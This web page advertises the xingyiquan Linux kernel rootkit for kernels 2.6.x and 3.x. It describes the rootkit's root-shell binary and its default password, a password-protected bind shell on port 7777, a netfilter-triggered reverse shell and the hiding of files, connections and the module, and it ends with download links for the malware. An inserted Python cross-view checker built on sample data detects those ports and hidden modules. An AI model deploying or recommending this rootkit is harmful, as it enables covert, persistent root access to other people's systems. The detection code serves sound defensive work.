xingyiquan – simple linux kernel rootkit for kernel 3.x and kernel 2.6.x

This is a simple Linux kernel rootkit that works on kernel 3.x and 2.6.x.

FUNCTIONS

– escalate privilege
This rootkit ships a userspace binary named xingyi_rootshell. Once the rootkit is installed, a root shell is obtained by running: ./xingyi_rootshell "sw0rdm4n". The string "sw0rdm4n" is the default root-shell password; it is defined in the userspace config file xingyi_userspace_src/xingyi_userspace_config.h.

– bindshell
This rootkit has a default bind shell on port 7777 protected by the default password "sw0rdm4n". The string "sw0rdm4n" is the default bind-shell password; it is defined in the userspace config file xingyi_userspace_src/xingyi_userspace_config.h.

– reverse shell
This rootkit's reverse shell is triggered by a netfilter hook. To receive a reverse shell on your IP on port 7777, connect with telnet to port 1337 on the box where the rootkit is installed. Before that, make sure a netcat listener is running on port 7777.

– other common functions
Other common functions: hide files/dirs, hide connections, hide module, hook kill process, hook open, hook open directory, etc.
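The bind shell on 7777, the trigger on 1337 and the hidden module described above are all things a defender can look for. The following host-side cross-view check is an added example written for this page, not code from the xingyiquan project; the /proc/net/tcp excerpt and the module names are constructed sample data, and the module name "sample_hidden" is a placeholder, not the rootkit's real module name.

```python
"""Cross-view checks for the indicators this post describes.

Sample data below is constructed; on a real host read /proc/net/tcp and
/proc/modules and list /sys/module instead. A kernel rootkit that hooks
/proc reads can filter these rows, so treat a clean result as a lower
bound and confirm with an external port scan or an offline disk/memory view.
"""

# Ports named in the post: bind shell listener (7777) and reverse-shell trigger (1337).
SUSPECT_PORTS = {7777, 1337}
TCP_LISTEN = 0x0A  # socket state code used in /proc/net/tcp

# Constructed /proc/net/tcp excerpt (not captured from a real host).
# 0x0016 = 22 (sshd), 0x1E61 = 7777 (listening), 0x0539 = 1337 (established).
SAMPLE_PROC_NET_TCP = """\
  sl  local_address rem_address   st tx_queue rx_queue tr tm->when retrnsmt   uid  timeout inode
   0: 00000000:0016 00000000:0000 0A 00000000:00000000 00:00000000 00000000     0        0 12345 1 0000000000000000 100 0 0 10 0
   1: 00000000:1E61 00000000:0000 0A 00000000:00000000 00:00000000 00000000     0        0 12346 1 0000000000000000 100 0 0 10 0
   2: 0100007F:0539 0100007F:9C40 01 00000000:00000000 00:00000000 00000000  1000        0 12347 1 0000000000000000 20 4 30 10 -1
"""


def parse_proc_net_tcp(text):
    """Return [(local_port, state), ...] for each socket row, skipping the header."""
    rows = []
    for line in text.splitlines()[1:]:
        fields = line.split()
        if len(fields) < 4:
            continue
        local_port = int(fields[1].split(":")[1], 16)  # local_address is hex ip:port
        state = int(fields[3], 16)
        rows.append((local_port, state))
    return rows


def suspect_listeners(text, ports=SUSPECT_PORTS):
    """Ports from `ports` that have a socket in LISTEN state, sorted."""
    return sorted({p for p, st in parse_proc_net_tcp(text)
                   if st == TCP_LISTEN and p in ports})


def hidden_modules(proc_modules_text, sysfs_module_names):
    """Names present in sysfs but absent from /proc/modules (the lsmod view).

    On a real host only pass /sys/module entries that contain an 'initstate'
    file, since built-in code also appears under /sys/module.
    """
    listed = {line.split()[0] for line in proc_modules_text.splitlines() if line.strip()}
    return sorted(set(sysfs_module_names) - listed)
```

A hit on 7777 or a module name that sysfs knows but lsmod does not is a reason to take the host offline for a fuller look, not proof by itself.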

Download

http://www.ringlayer.net/repo/xingyiquan.tar.gz

http://dl.packetstormsecurity.net/UNIX/penetration/rootkits/xingyiquan.tar.gz
